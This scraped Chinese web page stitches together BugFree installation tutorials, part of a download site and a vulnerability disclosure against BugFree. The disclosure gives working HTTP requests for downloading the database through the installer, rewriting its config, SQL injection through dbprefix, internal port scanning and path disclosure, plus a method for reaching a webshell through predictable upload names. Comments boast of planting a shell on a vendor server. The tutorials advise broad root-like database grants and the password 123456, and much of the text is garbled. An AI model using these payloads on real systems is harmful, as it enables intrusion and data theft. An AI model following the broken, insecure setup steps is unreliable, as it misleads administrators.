bugfree 配置安装了打不开为什么

CentOS安装BugFree_Linux教程_Linux公社-Linux系统门户网站
你好,游客
CentOS安装BugFree
来源:Linux社区&
作者:kevinwu
BugFree是借鉴微软的研发流程和Bug管理理念,基于PHP和MySQL由一淘测试团队工具组负责开发完成的一个Bug管理系统。Bugfree简单实用、免费并且开放源代码,因此也有一些互联网公司使用这个bug管理系统,下面我就把在上的安装过程和大家分享一下。
1. 安装apache
yum install httpd&
2. 安装mysql
yum install mysql mysql-server
注:已安装mysql的跳过此步骤
3. 安装PHP
yum install php php-mysql php-gd php-imap php-ldap php-odbc php-pear php-xml php-xmlrpc
4. 安装PHP加密算法插件
yum install libmcrypt
yum install php-mcrypt
注:libmcrypt是加密算法扩展库,php-mcrypt是Mcrypt对PHP的一个扩展
5. 安装bugfree
下载bugfree:wget http:///sites/default/files/bugfree3.zip
解压:unzip bugfree3.zip
重命名解压后的文件:mv bugfree3 bugfree
把bugfree放到apache的DocumentRoot:mv bugfree /var/www/html创建附件上传目录:cdmkdir BugFile
改变bugfree的读写权限:chmod -R <SPAN style="COLOR: #7 bugfree
& & 1) 配置apache& &&
   vi /etc/httpd/conf/httpd.conf
修改默认端口号 Listen <SPAN style="COLOR: # --& Listen <SPAN style="COLOR: #99
修改默认文件路径 DocumentRoot "/var/www/html" --& DocumentRoot "/home/kevin/html" 
启动httpd服务:service httpd start
& & 2) 配置mysql
  & 启动mysqld服务:service mysqld start&&&&& 注:mysqld服务已启动的跳过此步骤&&& &&&&& 登陆mysql:mysql -uroot -p&&&&& 创建新用户:CREATE USER 'bugfree'@'localhost' IDENTIFIED BY '<SPAN style="COLOR: #3456';&&&&& 新用户授权:grant all privileges on *.* to bugfree@localhost identified by '<SPAN style="COLOR: #3456';&& &&&&& 注:以上授权方式需要把mysql和bugfree安装在同一台机器上& &
& & 3) 配置bugfree
浏览器访问http://&servername&:port/bugfree/install
例如:http://<SPAN style="COLOR: #2.168.31.20:7999/bugfree/install
按照提示配置bugfree关联的数据库
注:要在root权限下操作,即用root登陆或者sudo来操作&&
7. 完成安装,进入BugFree
 &初始用户名: admin 初始密码:123456
相关资讯 & & &
& (02/18/:50)
& (10/20/:00)
& (10/07/:16)
& (12/11/:24)
& (10/07/:10)
& (10/07/:20)
图片资讯 & & &
   同意评论声明
   发表
尊重网上道德,遵守中华人民共和国的各项有关法律法规
承担一切因您的行为而直接或间接导致的民事或刑事法律责任
本站管理人员有权保留或删除其管辖留言中的任意内容
本站有权在网站内转载或引用您的评论
参与本评论即表明您已经阅读并接受上述条款bugfree安装与配置
bugfree安装与配置
一、配置环境
&操作系统&windows server 2003&xampp 版本&xampp-win32-1.7.4&bugfree版本&bugfree-v2.1.3xampp简介xampp是一款跨平台的集成 apache + mysql + php环境,是的配置AMP服务器变得简单轻松,支持windows,solaris,
MacOSX,linux。本文以win7 32位系统为例
software准备
在http://www.apachefriends.org/zh_cn/xampp-windows.html上下载xampp-win32-1.7.7-VC9-installer.exe。在http://www./blog/上下载bugfree-v2.1.3。
二、安装步骤
1、安装xampp以管理员身份安装xampp,安装到尾声的时候会询问是否设置为服务(方便每次开机自动运行),选择Yes。接着xampp的设置脚本会启动,完成后提示是否成功。最后提示是否现在启动xampp control panel。点击Yes,出现下图:
启动apache和mysql服务,如果apache不能成功启动,最大原因是80端口被占用,把占用端口的进程关掉即可,最简单的方法就是重启电脑。
xampp默认安装路径为:C:\xampp。
检测xampp是否安装成功:在浏览器中输入,回车后显示如下图:
表示已经安装成功,点击界面右下角“中文”,将界面语言设置为中文。
xampp安全配置:在浏览器中输入,敲回车
红字是不安全的,所以要去掉红字。
2、MySQL安全控制台&XAMPP目录保护
浏览器中输入&,敲回车后出现如下图:
为mysql root设置密码,输入自己的密码;PhpMyAdmin 认证选择http,然后点击【改变密码】,密码设置成功。
设置Xampp目录保护,输入用户名和密码,点击【保护XAMPP文件夹】后,提示XAMPP目录保护设置成功。
一定要记住密码哦,每次配置的时候都需要输入用户名和密码的。
3、用PHPmyadimin配置mysql在浏览器中输入,敲回车后如下图
刚才设置的密码在这里要用到了,用户名输入root,密码输入刚才自己设置的密码。就可以进入数据库了。
如果重新登录phpmyadmin,发现无法连接,需要在PHPmyadmin下配置config.inc.php文件,该文件位于
C:\xampp\phpMyAdmin中,找到config.inc.php文件,打开编辑,配置如下:$cfg['Servers'][$i]['auth_type']&&&& = 'http';$cfg['Servers'][$i]['user'] = 'root';$cfg['Servers'][$i]['password'] = '123456';
pwd那行,是根据自己情况设置的。保存一下就可以了。
4、设置PHP运行于安装模式
打开C:\xampp\php\php.ini文件,查找safe_mode字段,设置为On,保存退出。
重启apache服务后,通过检查其状态为安全。
5、安装bugfree将bugfree解压到C:\xampp\htdocs目录下,然后在浏览器中输入 对bugfree进行安装。
在打开的页面中点击安装bugfree,出现系统提示:数据库连接失败!如下如图
点击“创建数据库”链接,出现如下错误:
ERROR OCCUR TO /bugfree/install.php:You have an error in your SQL check the manual that corresponds to your MySQL server version for the right syntax to use near 'TYPE=MyISAM DEFAULT CHARSET=UTF8' at line 54修改方法如下:修改 C:\xampp\htdocs\bugfree\Schema.php文件中所有的 TYPE=MyISAM 改为 ENGINE=MyISAM。
这是因为MYSQL高版本不再使用TYPE=MyISAM 的原因。安装完成后进入bugfree 出现错误
Deprecated: Call-time pass-by-reference has been deprecated in
D:\xampp\htdocs\bugfree\Include\Class\XmlParse.class.php on line
是PHP未开启allow_call_time_pass_reference
找到php的配置文件xampp\php\php.ini,在其中搜 allow_call_time_pass_reference , 将后面的值从Off 改成 On 就可以了。
一定要Web Server重启。
发表评论:
TA的最新馆藏[转]&[转]&[转]&bugfree安装及配置--林婉茹的博客--凤凰网博客
凤凰博报 由你开始
你确定要删除此博文及其所有评论吗?
bugfree安装及配置
1.下载Apache、Php、Mysql等的运止环境——XAMPP网址:2.解压缩到XAMPP目录下,D:Program FilesXAMPP3.运止D:Program FilesXAMPPsetup_xampp.bat4.运止xampp-control.exe,提醒bugfile文件夹出有读写权限,查看XAMPP目录,收现该目录下并出有该文件夹,因而脚动竖立此文件夹,然后再次搜检,收现乐成经由过程搜检,可以进止下一步调的配置操纵。5.启动Apache效劳器战Mysql效劳器6.在阅读器中输入http:localhost,出现XAMPP尾页,选择左边目录树中的项,相识一下XAMPP,同时,配置下【平安】下的相闭暗码、用户名等平安疑息。7.下载bugfree网址为:解压缩后放到D:Program Filesxampphtdocs目录下。【寄望,此处没有是把bugfree目录放在阿谁目录下,而是要把bugfree目录下的文件复制到阿谁目录下。我初次安装时,等于把bugfree目录放在htdocs目录下,可是启动阅读器输入http:localhost之后,并出有弹出预期的bugfree配置页里。可是更凡是是的方法是把bugfree目录复制到htdocs目录,可是我那样配置止没有通,果为只是做相识,所以出有深化探索,各人安装时借请寄望。】8.在阅读器中输入http:localhost,弹掉足误提醒==================================================================================================PHP Errormysql_escape_string(): This fu use mysql_real_escape_string() instead.D:Program FilesxampphtdocsprotectedserviceSqlService.php(563)551 *552 * @author Yupeng Lee&&553 * @param string $fieldName FieldName554 * @param string $operatorName =,&,&,&= eg.555 * @param string $fieldValue FieldValue556 * @return string Query string for SQL557 */558 private static function baseGetFieldQueryStr($searchFieldConfig, $type, $fieldName, $operatorName, $fieldValue)559 {560 $basicTableName = "{{" . $type . "view}}";561 $fieldValue = trim($fieldValue);562563 $fieldValue = mysql_escape_string($fieldValue);564 //handle search value %565 $fieldValue = str_replace("%", "%", $fieldValue);566 // $fieldValue = str_replace("_", "_", $fieldValue);567568 $queryStr = "";569 if($fieldValue == "")570 {571 return $queryS572 }573 elseif(Info::MARK == $fieldName)574 {575 $inOrNotIn = " not in ";Stack Trace#0 +– D:Program FilesxampphtdocsprotectedserviceSqlService.php(563): mysql_escape_string("Sample Product")558 private static function baseGetFieldQueryStr($searchFieldConfig, $type, $fieldName, $operatorName, $fieldValue)559 {560 $basicTableName = "{{" . $type . "view}}";561 $fieldValue = trim($fieldValue);562563 $fieldValue = mysql_escape_string($fieldValue);564 //handle search value %565 $fieldValue = str_replace("%", "%", $fieldValue);566 // $fieldValue = str_replace("_", "_", $fieldValue);567568 $queryStr = "";#1 +– D:Program FilesxampphtdocsprotectedserviceSqlService.php(474): SqlService::baseGetFieldQueryStr(array("id" =& array("label" =& "ID", "type" =& "number", "isBasic" =& true), "title" =& array("label" =& "Bug题目", "type" =& "string", "isBasic" =& true), "module_name" =& array("label" =& "模块途径", "type" =& "path", "isBasic" =& true), "bug_status" =& array("label" =& "状态", "type" =& "option", "isBasic" =& true, "value" =& array("", "Active", "Resolved", "Closed")), ...), "bug", "module_name", "UNDER", ...)469 $queryGroup = array();470 foreach($searchRowConditionArr as $rowCondtion)471 {472 $whereStr = " ";473 $tempQueryStr = self::baseGetFieldQueryStr($searchFieldConfig, $type,474 $rowCondtion[$fieldName], $rowCondtion[$operatorName], $rowCondtion[$valueName]);475 if($tempQueryStr == "")476 {477 if($rowCondtion[$leftParenthesesName] == "(" && $rowCondtion[$rightParenthesesName] == ")")478 {479#2 +– D:Program FilesxampphtdocsprotectedcontrollersInfoController.php(558): SqlService::baseGetGroupQueryStr(array("id" =& array("label" =& "ID", "type" =& "number", "isBasic" =& true), "title" =& array("label" =& "Bug题目", "type" =& "string", "isBasic" =& true), "module_name" =& array("label" =& "模块途径", "type" =& "path", "isBasic" =& true), "bug_status" =& array("label" =& "状态", "type" =& "option", "isBasic" =& true, "value" =& array("", "Active", "Resolved", "Closed")), ...), "bug", array(array("leftParenthesesName" =& "", "field" =& "module_name", "operator" =& "UNDER", "value" =& "Sample Product", ...)))553 }554 }555556 $searchRowArr = $this-&setSpecialModuleCondiftion($searchRowArr, $productName);557 Yii::app()-&user-&setState($productId . "_" . $infoType . "_search", $searchRowArr);558 $getSqlResult = SqlService::baseGetGroupQueryStr($searchFieldConfig, $infoType, $searchRowArr);559 if(CommonService::$ApiResult["FAIL"] == $getSqlResult["status"])560 {561 $whereStr = " 1&&1 ";562 }563 else#3 +– D:Program FilesxampphtdocslibwebactionsCInlineAction.php(50): InfoController-&actionIndex()45 $controller=$this-&getController();46 $method=new ReflectionMethod($controller, $methodName);47 if($method-&getNumberOfParameters()&0)48 return $this-&runWithParamsInternal($controller, $method, $params);49 else50 return $controller-&$methodName();51 }5253 }#4 +– D:Program FilesxampphtdocslibwebCController.php(300): CInlineAction-&runWithParams(array("type" =& "bug", "product_id" =& "1"))295 {296 $priorAction=$this-&_297 $this-&_action=$298 if($this-&beforeAction($action))299 {300 if($action-&runWithParams($this-&getActionParams())===false)301 $this-&invalidActionParams($action);302 else303 $this-&afterAction($action);304 }305 $this-&_action=$priorA#5 +– D:Program FilesxampphtdocslibwebfiltersCFilterChain.php(134): CController-&runAction(CInlineAction)129 $filter=$this-&itemAt($this-&filterIndex++);130 Yii::trace("Running filter ".($filter instanceof CInlineFilter ? get_class($this-&controller).".filter".$filter-&name."()":get_class($filter).".filter()"),"system.web.filters.CFilterChain");131 $filter-&filter($this);132 }133 else134 $this-&controller-&runAction($this-&action);135 }136 }#6 +– D:Program FilesxampphtdocsprotectedcomponentsController.php(45): CFilterChain-&run()40 if((true != Yii::app()-&user-&isGuest) &&41 empty($productId))42 {43 LoginService::setUserInfo();44 }45 $filterChain-&run();46 }4748 public function init()49 {50 $language = Yii::app()-&user-&getState("language");#7 +– D:Program FilesxampphtdocslibwebfiltersCInlineFilter.php(59): Controller-&filterUserInfo(CFilterChain)54 * @param CFilterChain $filterChain the filter chain that the filter is on.55 */56 public function filter($filterChain)57 {58 $method="filter".$this-&59 $filterChain-&controller-&$method($filterChain);60 }61 }#8 +– D:Program FilesxampphtdocslibwebfiltersCFilterChain.php(131): CInlineFilter-&filter(CFilterChain)126 {127 if($this-&offsetExists($this-&filterIndex))128 {129 $filter=$this-&itemAt($this-&filterIndex++);130 Yii::trace("Running filter ".($filter instanceof CInlineFilter ? get_class($this-&controller).".filter".$filter-&name."()":get_class($filter).".filter()"),"system.web.filters.CFilterChain");131 $filter-&filter($this);132 }133 else134 $this-&controller-&runAction($this-&action);135 }136 }#9 +– D:Program FilesxampphtdocslibwebfiltersCFilter.php(41): CFilterChain-&run()36 */37 public function filter($filterChain)38 {39 if($this-&preFilter($filterChain))40 {41 $filterChain-&run();42 $this-&postFilter($filterChain);43 }44 }4546 /**#10 +– D:Program FilesxampphtdocslibwebCController.php(1144): CFilter-&filter(CFilterChain)1139 */1140 public function filterAccessControl($filterChain)1141 {1142 $filter=new CAccessControlF1143 $filter-&setRules($this-&accessRules());1144 $filter-&filter($filterChain);1145 }11461147 /**1148 * Generates pagination information.1149 * This method can be used to generate pagination information given item count#11 +– D:Program FilesxampphtdocslibwebfiltersCInlineFilter.php(59): CController-&filterAccessControl(CFilterChain)54 * @param CFilterChain $filterChain the filter chain that the filter is on.55 */56 public function filter($filterChain)57 {58 $method="filter".$this-&59 $filterChain-&controller-&$method($filterChain);60 }61 }#12 +– D:Program FilesxampphtdocslibwebfiltersCFilterChain.php(131): CInlineFilter-&filter(CFilterChain)126 {127 if($this-&offsetExists($this-&filterIndex))128 {129 $filter=$this-&itemAt($this-&filterIndex++);130 Yii::trace("Running filter ".($filter instanceof CInlineFilter ? get_class($this-&controller).".filter".$filter-&name."()":get_class($filter).".filter()"),"system.web.filters.CFilterChain");131 $filter-&filter($this);132 }133 else134 $this-&controller-&runAction($this-&action);135 }136 }#13 +– D:Program FilesxampphtdocslibwebCController.php(283): CFilterChain-&run()278 $this-&runAction($action);279 else280 {281 $priorAction=$this-&_282 $this-&_action=$283 CFilterChain::create($this,$action,$filters)-&run();284 $this-&_action=$priorA285 }286 }287288 /**#14 +– D:Program FilesxampphtdocslibwebCController.php(257): CController-&runActionWithFilters(CInlineAction, array("accessControl", "userInfo"))252 {253 if(($parent=$this-&getModule())===null)254 $parent=Yii::app();255 if($parent-&beforeControllerAction($this,$action))256 {257 $this-&runActionWithFilters($action,$this-&filters());258 $parent-&afterControllerAction($this,$action);259 }260 }261 else262 $this-&missingAction($actionID);#15 +– D:Program FilesxampphtdocslibwebCWebApplication.php(277): CController-&run("index")272 {273 list($controller,$actionID)=$274 $oldController=$this-&_275 $this-&_controller=$276 $controller-&init();277 $controller-&run($actionID);278 $this-&_controller=$oldC279 }280 else281 throw new CHttpException(404,Yii::t("yii","Unable to resolve the request "{route}".",282 array("{route}"=&$route===""?$this-&defaultController:$route)));#16 +– D:Program FilesxampphtdocslibwebCWebApplication.php(136): CWebApplication-&runController("info/index")131 foreach(array_splice($this-&catchAllRequest,1) as $name=&$value)132 $_GET[$name]=$133 }134 else135 $route=$this-&getUrlManager()-&parseUrl($this-&getRequest());136 $this-&runController($route);137 }138139 /**140 * Registers the core application components.141 * This method overrides the parent implementation by registering additional core components.#17 +– D:Program FilesxampphtdocslibaseCApplication.php(158): CWebApplication-&processRequest()153 */154 public function run()155 {156 if($this-&hasEventHandler("onBeginRequest"))157 $this-&onBeginRequest(new CEvent($this));158 $this-&processRequest();159 if($this-&hasEventHandler("onEndRequest"))160 $this-&onEndRequest(new CEvent($this));161 }162163 /**#18 +– D:Program Filesxampphtdocsindex.php(15): CApplication-&run()10 // remove the following lines when in production mode11 defined("YII_DEBUG") or define("YII_DEBUG",true);12 // specify how many levels of call stack should be shown in each log message13 defined("YII_TRACE_LEVEL") or define("YII_TRACE_LEVEL",3);14 require_once($yii);15 Yii::createWebApplication($config)-&run(); 11:30:05 Apache/2.4.7 (Win32) OpenSSL/0.9.8y PHP/5.4.22 Yii Framework/1.1.8 ===================================================================================================凭证提醒,找到文件D:Program FilesxampphtdocsprotectedserviceSqlService.php,运用记事本打开SqlService。php文件,然后把函数mysql_escape_string()改为use mysql_real_escape_string() ,刷新阅读器,可以普通启动bugfree,并进入bugfree尾页。本文出自 “” 博客,请务必保存此出处
最近发现一个推荐七星彩不错的网站,感兴趣的朋友进去看看把/
有不一样的发现
<div class="num1_b" id="commend_num_
上一篇&&&&
下一篇&&&&
欢迎您来我的凤凰博客!
博主最近发表的 10 篇博文
凤凰博报微信&&&&bugfree安装步骤及常见问题
bugfree安装步骤及常见问题
安装bugfree出现的问题,我在自己安装的时候出现了不少问题,在收集了好多解决方案并成功。
若举报审核通过,可奖励20下载分
被举报人:
举报的资源分:
请选择类型
资源无法下载
资源无法使用
标题与实际内容不符
含有危害国家安全内容
含有反动色情等内容
含广告内容
版权问题,侵犯个人或公司的版权
*详细原因:
VIP下载&&免积分60元/年(1200次)
您可能还需要
开发技术下载排行分享漏洞:
披露状态:
: 细节已通知厂商并且等待厂商处理中
: 厂商已经确认,细节仅向厂商公开
: 细节向第三方安全合作伙伴开放(、、)
: 细节向核心白帽子及相关领域专家公开
: 细节向普通白帽子公开
: 细节向实习白帽子公开
: 细节向公众公开
简要描述:
bugfree 是国内一款比较不错的开源的bug管理产品,
日前偶然遇到一处使用bugfree的地方,于是就花了些时间挖了挖,发现一些问题,懒得开那么多页面了,就打包一起发吧
详细说明:
1,上传,自评级别:严重。
之前园长其实说过这个问题,但是只是说可以上传。没有说到其实文件名具有很强的可预测性,
园长漏洞参见这里:http://**.**.**.**/bugs/wooyun-
上传的文件,生成的路径会有几个部分,一个是项目id,一个是月份,一个就是当前的时间。
比如我在bugid是344 的 条目里上传的php文件,访问的物理路径会是这样:
/BugFile/Project344/732180.php
而文件名则很容易理解,是21点07分32秒,后三位180,其实是随机的,从100到200,递增10,写个程序猜几次就猜到了。
所以,这里如果没有对BugFile目录做文件执行设置,那恭喜你,直接就拿shell了。
2,垂直权限 越权,自评:低
访问 bugfree/adminAction/,可以看到 管理员的若干操作,
3,数据库下载
自评:严重
漏洞文件:/install/index.php
这个就厉害了,/bugfree/install/index.php文件,当action是backup并且download变量为真的时候就会去备份config配置文件指定的库。然后返回给你。看到这里你可能觉得只能下载bugfree的库啊,别急,后面还有,修改config文件。
GET /bugfree/install/index.php?action=backup&download=123 HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: **.**.**.**/bugfree/install/
Host: **.**.**.**
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
虽然location 指定到了index,但是返回的内容就是数据库的内容。于是,目标库就被下载回来了。
4, 修改config文件 自评:高
漏洞文件:/install/index.php
POST /bugfree/install/ HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: **.**.**.**/bugfree/install/
Content-Length: 139
Content-Type: application/x-www-form-urlencoded
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries:aspectalerts
Cookie: PHPSESSID=4jn42unqk7rkqep1vraemarlf3
Host: **.**.**.**
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
accept=on&action=install&dbhost=**.**.**.**&dbname=mysql&dbprefix=bf_&#039;&dbpwd=123123&dbuser=root&language=zh_cn&port=3306&accept=123
漏洞证明:
5,内网数据库的暴力破解及端口扫描
漏洞文件:/install/index.php
安装过程中会对指定的地址及端口进行连接,执行建表的操作,这里我们可以修改为内网其他的地址与端口,以实现对内网数据库的攻击。还可以实现对内网的端口扫描。
可以连接的端口与不可以连接的端口返回不同的相应:
3307端口是成功的连接相应。说明3307是开放的。
连接的过程也可以看到服务器实际发起来对外的数据连接:
6,sql注入
自评:严重
漏洞文件:/install/index.php
还是安装过程,进行数据库的相关操作时,没有对dbprefix进行检查过滤,导致这里存在sql注入
POST /bugfree/install/ HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: **.**.**.**/bugfree/install/
Content-Length: 146
Content-Type: application/x-www-form-urlencoded
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries:aspectalerts
Cookie: PHPSESSID=4jn42unqk7rkqep1vraemarlf3
Host: **.**.**.**
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
accept=on&action=install&dbhost=localhost&dbname=mysql&dbprefix=tt`;#bf_&dbpwd=&dbuser=root&language=zh_cn&port=3306&accept=123
其他的,自己发挥吧。
7,物理路径泄漏
漏洞出现在文本编辑框处,编辑图片,选择浏览,
会发出如下的请求,而这个请求时错误的,代码实现的时候就时错的,
看完代码后,将地址修改如下,就可以成功了,但是,成功的时候,会返回当前web站点的物理路径。
GET /bugfree/assets/5839844b/php/file_manager_json.php?path=&order=NAME&dir=image&4 HTTP/1.1
Host: **.**.**.**
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:18.0) Gecko/ Firefox/18.0
Accept: text/html,application/xhtml+xml,application/q=0.9,*/*;q=0.8
Accept-Language: zh-cn,q=0.8,en-q=0.5,q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive
HTTP/1.1 200 OK
Date: Wed, 06 Aug :35 GMT
Server: Apache
Content-Length: 207
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/ charset=UTF-8
/lampp/bugfree/htdocs/bugfree/assets/5839844b/attached/image{&moveup_dir_path&:&&,&current_dir_path&:&&,&current_url&:&\/bugfree\/assets\/5839844b\/php\/..\/attached\/image\/&,&total_count&:0,&file_list&:[]}
ok了,累死了,
修复方案:
版权声明:转载请注明来源 @
厂商回应:
危害等级:高
漏洞Rank:20
确认时间: 08:26
厂商回复:
CNVD确认所述情况(未进行本地和实例复现),由于未建立与软件生产厂商的直接处置渠道,待认领。按多个漏洞评分,ran k20
最新状态:
漏洞评价:
对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值
漏洞评价(少于3人评价):
登陆后才能进行评分
哈哈,原来那群搞bugfree的人散伙了,搞了个蝉道
@papaver 没错,我前段时间还上他们demo服务器玩了一会
@papaver 还没来得及提交,他们就发现我了,明明藏得深,奈何道高一次
@茜茜公主 我会说他们叫我做安全顾问。发现了你留的shell叫他们给删了吗。
@roker 嗯,我藏到蝉知的某个目录里去了,然后不知道什么时候就默默升级了
渗透一网站发现有bugfree于是乎下回来分析,确认有很多漏洞过后开始搞,结果发现不存在,乌云之,原来你已经发过,他修补了,蛋疼了。
登录后才能发表评论,请先

我要回帖

更多关于 bugfree 配置 的文章

 

随机推荐